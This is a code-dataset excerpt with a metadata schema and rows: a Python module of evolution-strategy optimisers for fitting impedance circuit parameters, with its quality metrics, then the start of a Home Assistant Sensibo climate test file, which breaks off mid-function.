hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
16cbf3091006544445545fa2c6789ddbdf2b95ae
| 29,009
|
py
|
Python
|
v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/goa/evolution_based/evolution_strategy/es_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
import copy
import math
import random
from time import perf_counter
import os
import sys
sys.path.append('../../../')
from utils.file_utils.filename_utils import get_ecm_num_str, get_Num_len
from data_processor.GOA_simulation.GOA_ECMs_simulation import load_sim_ecm_para_config_dict
from goa.GOA_criterions import goa_criterion_pack
from GA_pack.fittness_functions.eis_fitness import cal_EIS_WSE_fitness_1
"""
(u+u, λ) ES
U parent
U offsprings
select the U entity from U+U (parents and child)
"""
class ES_0:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
ch12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
什么是进化策略
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
casual:
number of search agents
number of iteration
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, limits_list, fitness_function):
self.limits_list = limits_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in limits_list]
self.sigma_ceil = 5
self.sigma_list = [random.uniform(0, self.sigma_ceil) for i in range(len(limits_list))]
self.fitness = fitness_function(self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_ceil:
self.sigma_list[index] = random.uniform(0, self.sigma_ceil)
self.fitness = self.fitness_function(self.x_list)
def __init__(self, iter_num, entity_num, limits_list, fitness_function):
self.iter_num = iter_num
self.entity_num = entity_num
self.limits_list = limits_list
self.fitness_function = fitness_function
# Initialize parents entities
self.entities_list = [self.Entity(limits_list, fitness_function) for i in range(entity_num)]
# Initialize global best entity and maxmize its fitness
self.global_best_entity = self.Entity(limits_list, fitness_function)
def evolve(self):
current_best_entity_list = []
global_best_entity_list = []
for iter in range(self.iter_num):
# Select the current/global best entity
current_best_entity = sorted(self.entities_list, key = lambda entity: entity.fitness, reverse=False)[0]
if self.global_best_entity.fitness > current_best_entity.fitness:
self.global_best_entity = current_best_entity
global_best_entity_list.append(self.global_best_entity)
current_best_entity_list.append(current_best_entity)
# Generate child
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Crossover at multiple points according to random number
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, 0.001)
x = x + math.sqrt(sigma) * random.gauss(mu=0, sigma=1)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.limits_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parent + child and save the first U entity by their fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
return current_best_entity_list, global_best_entity_list
# if __name__ == '__main__':
# iter_num = 1000
# entity_num = 10
# dim = 4
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# es = ES_0(iter_num, entity_num, f1_limits_list, f1_fitness_function)
# current_best_entity_list, global_best_entity_list = es.evolve()
# print('Best entity position:', es.global_best_entity.x_list)
# print('Fitness:', es.global_best_entity.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in current_best_entity_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_entity_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line1.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class ES_1:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
什么是进化策略
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
casual:
number of search agents
number of iteration
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, limits_list, sigma_limit_list, fitness_function):
self.limits_list = limits_list
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.x_list)
def __init__(self, iter_num, entity_num, limits_list, fitness_function):
self.iter_num = iter_num
self.entity_num = entity_num
self.limits_list = limits_list
# The scale of limitation of sigma in different dimensions
# should be consistent with the limitation of each dimension
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parents entities
self.entities_list = [self.Entity(limits_list, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize global best entity and maximize its fitness
self.global_best_entity = self.Entity(limits_list, self.sigma_limit_list, fitness_function)
def evolve(self):
current_best_entity_list = []
global_best_entity_list = []
for iter in range(self.iter_num):
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate child
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Crossover at multiple points according to random number
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.limits_list, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parent + child and save the first U entity by their fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
return current_best_entity_list, global_best_entity_list
# if __name__ == '__main__':
# iter_num = 1000
# entity_num = 10
# dim = 4
#
# f1_limits_list = [[-100, 100] for i in range(dim)]
# from GA_pack.fittness_functions.f1 import f1
#
# f1_fitness_function = f1
# es = ES_1(iter_num, entity_num, f1_limits_list, f1_fitness_function)
# current_best_entity_list, global_best_entity_list = es.evolve()
# print('Best entity position:', es.global_best_entity.x_list)
# print('Fitness:', es.global_best_entity.fitness)
#
# # Draw the best entity in each iteration.
# iter_list = [i for i in range(iter_num)]
# cur_fitness_list = [entity.fitness for entity in current_best_entity_list]
# cur_global_fitness_list = [entity.fitness for entity in global_best_entity_list]
#
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# line1, = ax.plot(iter_list, cur_fitness_list, label='Current Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line1.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# line2, = ax.plot(iter_list, cur_global_fitness_list, label='Current Global Iteration {0}\nentity number {1}\nDimension {2}'.format(iter_num, entity_num, dim))
# line2.set_dashes([2, 2, 10, 2]) # 2pt line, 2pt break, 10pt line, 2pt break
# ax.legend()
# plt.xlabel('Iteration times')
# plt.ylabel('Error rate')
# plt.title('Search the minimum of f1 = sum(Xi ^ 2)')
# plt.show()
class ES_EIS:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
什么是进化策略
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
casual:
number of search agents
number of iteration
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, exp_data_dict, sigma_limit_list, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, entity_num, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.entity_num = entity_num
# The scale of limitation of sigma in different dimensions
# should be consistent with the limitation of each dimension
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parents entities
self.entities_list = [self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize global best entity and maximize its fitness
self.global_best_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function)
def search(self):
current_best_entity_list = []
global_best_entity_list = []
continue_criterion = True
iter = 0
while continue_criterion:
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate child
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Crossover at multiple points according to random number
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parent + child and save the first U entity by their fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
# There are two entities only after at least two iteration
# If there is global_best_entity_list, use it,
# If not, use current_best_entity_list to replace
if iter >= 1:
x_lists_list = [global_best_entity_list[-2].x_list, global_best_entity_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, iter=iter,
max_iter_time=self.iter_num,
data_dict=self.exp_data_dict)
if goa_criterion:
continue_criterion = False
iter += 1
return current_best_entity_list, global_best_entity_list, iter, chi_squared
class ES_EIS_access:
"""
Refer:
Book:
Computational intelligence An introduction
part 3 EVOLUTIONARY COMPUTATION
12 Evolution Strategies
12.1 (1 + 1)-ES
12.2 Generic Evolution Strategy Algorithm
12.3 Strategy Parameters and Self-Adaptation
12.3.1 Strategy Parameter Types
Paper:
Web:
什么是进化策略
https://morvanzhou.github.io/tutorials/machine-learning/evolutionary-algorithm/3-01-evolution-strategy/
Code
Matlab
Evolution strategies (es) in matlab
http://freesourcecode.net/matlabprojects/64999/evolution-strategies-(es)-in-matlab#.XYQ0UnakFbo
Adjustable parameters:
casual:
number of search agents
number of iteration
unique:
Attention:
Version:
0
"""
class Entity:
def __init__(self, exp_data_dict, sigma_limit_list, fitness_function):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.sigma_limit_list = sigma_limit_list
self.fitness_function = fitness_function
self.x_list = [random.uniform(limit[0], limit[1]) for limit in self.limits_list]
self.sigma_list = [random.uniform(0.0, s_limit) for s_limit in self.sigma_limit_list]
self.fitness = fitness_function(self.exp_data_dict, self.x_list)
def update(self):
for index in range(len(self.limits_list)):
if (self.x_list[index] < self.limits_list[index][0]) or (self.x_list[index] > self.limits_list[index][1]):
self.x_list[index] = random.uniform(self.limits_list[index][0], self.limits_list[index][1])
for index in range(len(self.sigma_list)):
if self.sigma_list[index] > self.sigma_limit_list[index]:
self.sigma_list[index] = random.uniform(0, self.sigma_limit_list[index])
self.fitness = self.fitness_function(self.exp_data_dict, self.x_list)
def __init__(self, exp_data_dict, iter_num, entity_num, fitness_function=cal_EIS_WSE_fitness_1):
self.exp_data_dict = exp_data_dict
self.limits_list = exp_data_dict['limit']
self.iter_num = iter_num
self.entity_num = entity_num
# The scale of limitation of sigma in different dimensions
# should be consistent with the limitation of each dimension
self.sigma_limit_list = [(limit[1] - limit[0]) / 3 for limit in self.limits_list]
self.fitness_function = fitness_function
# Initialize parents entities
self.entities_list = [self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function) for i in range(entity_num)]
# Initialize global best entity and maximize its fitness
self.global_best_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, fitness_function)
def search(self, res_fn, start_time):
current_best_entity_list = []
global_best_entity_list = []
continue_criterion = True
iter = 0
while continue_criterion:
self.entities_list.sort(key=lambda en:en.fitness, reverse=False)
# Select the current/global best entity
current_best_entity = self.entities_list[0]
if current_best_entity.fitness < self.global_best_entity.fitness:
self.global_best_entity = copy.deepcopy(current_best_entity)
global_best_entity_list.append(copy.deepcopy(self.global_best_entity))
current_best_entity_list.append(copy.deepcopy(current_best_entity))
# Generate child
child_entities_list = []
for index in range(self.entity_num):
# Select two parents randomly
random_parent_indexes = random.sample(range(self.entity_num), 2)
father = self.entities_list[random_parent_indexes[0]]
mother = self.entities_list[random_parent_indexes[1]]
# Crossover at multiple points according to random number
child_x_list = []
child_sigma_list = []
for x_index in range(len(self.limits_list)):
r = random.random()
if r > 0.5:
# child_x_list.append(father.x_list[x_index])
# child_sigma_list.append(father.sigma_list[x_index])
x = father.x_list[x_index]
sigma = father.sigma_list[x_index]
else:
# child_x_list.append(mother.x_list[x_index])
# child_sigma_list.append(mother.sigma_list[x_index])
x = mother.x_list[x_index]
sigma = mother.sigma_list[x_index]
sigma = max(sigma + random.uniform(0, 1) - 0.5, self.sigma_limit_list[x_index] * 0.01)
x = x + random.gauss(mu=0, sigma=sigma)
child_x_list.append(x)
child_sigma_list.append(sigma)
child_entity = self.Entity(self.exp_data_dict, self.sigma_limit_list, self.fitness_function)
child_entity.x_list = child_x_list
child_entity.sigma_list = child_sigma_list
child_entity.update()
child_entities_list.append(child_entity)
# Rank parent + child and save the first U entity by their fitness
all_entity = self.entities_list + child_entities_list
self.entities_list = sorted(all_entity, key=lambda entity: entity.fitness, reverse=False)[:self.entity_num]
# There are two entities only after at least two iteration
# If there is global_best_entity_list, use it,
# If not, use current_best_entity_list to replace
if iter >= 1:
x_lists_list = [global_best_entity_list[-2].x_list, global_best_entity_list[-1].x_list]
goa_criterion, chi_squared = goa_criterion_pack(x_lists_list=x_lists_list, \
iter=iter, \
max_iter_time=self.iter_num, \
data_dict=self.exp_data_dict, \
CS_limit=1e-70)
# Write R(RC)_IS_lin-kk_res.txt into a txt file
# R(RC)_IS_lin-kk_res.txt = iter_time + fitted_para_list + Chi-Squared + Code running time
with open(res_fn, 'a+') as file:
line = str(iter) + ',[' \
+ ','.join([str(para) for para in global_best_entity_list[-1].x_list]) + '],' \
+ str(chi_squared) + ',' + str(perf_counter() - start_time) + '\n'
file.write(line)
if goa_criterion:
continue_criterion = False
iter += 1
def access_ES_EIS():
counter = 0
# Iterate on 9 ECMs
for i in range(1, 10):
ecm_sim_folder = '../../../datasets/goa_datasets/simulated'
ecm_num = i
ecm_num_str = get_ecm_num_str(ecm_num)
file_path = os.path.join(ecm_sim_folder, 'ecm_' + ecm_num_str)
sim_ecm = load_sim_ecm_para_config_dict(ecm_num, file_path)
para_num = len(sim_ecm['para'])
# Iterate for 100 times
for j in range(100):
t_start = perf_counter()
# ------------------------------ Change GOA name ------------------------------
goa = ES_EIS_access(exp_data_dict=sim_ecm, iter_num=10000, entity_num=10*para_num)
res_fn = 'es_ecm{0}_'.format(i) + get_Num_len(num=j, length=2) + '.txt'
# ------------------------------ Change GOA name ------------------------------
goa.search(res_fn, start_time=t_start)
counter += 1
print('ES left: {0}'.format(900 - counter))
access_ES_EIS()
| 48.267887
| 164
| 0.607398
| 3,633
| 29,009
| 4.566749
| 0.075145
| 0.052438
| 0.048219
| 0.029293
| 0.934181
| 0.928636
| 0.922488
| 0.916581
| 0.906395
| 0.891809
| 0
| 0.018062
| 0.303389
| 29,009
| 601
| 165
| 48.267887
| 0.802949
| 0.312799
| 0
| 0.779605
| 0
| 0
| 0.005866
| 0.002077
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055921
| false
| 0
| 0.032895
| 0
| 0.125
| 0.003289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16e83162600419490c56298c84ba3c8791caf968
| 28,770
|
py
|
Python
|
tests/components/sensibo/test_climate.py
|
Gluwc/home_assistant
|
0ace5af9143e9e9a279419ec8a469123e49eca45
|
[
"Apache-2.0"
] | 30,023
|
2016-04-13T10:17:53.000Z
|
2020-03-02T12:56:31.000Z
|
tests/components/sensibo/test_climate.py
|
Gluwc/home_assistant
|
0ace5af9143e9e9a279419ec8a469123e49eca45
|
[
"Apache-2.0"
] | 24,710
|
2016-04-13T08:27:26.000Z
|
2020-03-02T12:59:13.000Z
|
tests/components/sensibo/test_climate.py
|
Gluwc/home_assistant
|
0ace5af9143e9e9a279419ec8a469123e49eca45
|
[
"Apache-2.0"
] | 11,956
|
2016-04-13T18:42:31.000Z
|
2020-03-02T09:32:12.000Z
|
"""The test for the sensibo binary sensor platform."""
from __future__ import annotations
from datetime import datetime, timedelta
from unittest.mock import AsyncMock, patch
from pysensibo.model import SensiboData
import pytest
from voluptuous import MultipleInvalid
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
ATTR_HVAC_MODE,
ATTR_SWING_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_SWING_MODE,
SERVICE_SET_TEMPERATURE,
)
from homeassistant.components.sensibo.climate import (
ATTR_MINUTES,
SERVICE_ASSUME_STATE,
SERVICE_TIMER,
_find_valid_target_temp,
)
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_STATE,
ATTR_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_UNKNOWN,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.util import dt
from tests.common import async_fire_time_changed
async def test_climate_find_valid_targets():
"""Test function to return temperature from valid targets."""
valid_targets = [10, 16, 17, 18, 19, 20]
assert _find_valid_target_temp(7, valid_targets) == 10
assert _find_valid_target_temp(10, valid_targets) == 10
assert _find_valid_target_temp(11, valid_targets) == 16
assert _find_valid_target_temp(15, valid_targets) == 16
assert _find_valid_target_temp(16, valid_targets) == 16
assert _find_valid_target_temp(18.5, valid_targets) == 19
assert _find_valid_target_temp(20, valid_targets) == 20
assert _find_valid_target_temp(25, valid_targets) == 20
async def test_climate(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
state2 = hass.states.get("climate.kitchen")
assert state1.state == "heat"
assert state1.attributes == {
"hvac_modes": [
"cool",
"heat",
"dry",
"heat_cool",
"fan_only",
"off",
],
"min_temp": 10,
"max_temp": 20,
"target_temp_step": 1,
"fan_modes": ["quiet", "low", "medium"],
"swing_modes": [
"stopped",
"fixedTop",
"fixedMiddleTop",
],
"current_temperature": 21.2,
"temperature": 25,
"current_humidity": 32.9,
"fan_mode": "high",
"swing_mode": "stopped",
"friendly_name": "Hallway",
"supported_features": 41,
}
assert state2.state == "off"
async def test_climate_fan(
hass: HomeAssistant,
load_int: ConfigEntry,
monkeypatch: pytest.MonkeyPatch,
get_data: SensiboData,
) -> None:
"""Test the Sensibo climate fan service."""
state1 = hass.states.get("climate.hallway")
assert state1.attributes["fan_mode"] == "high"
with patch(
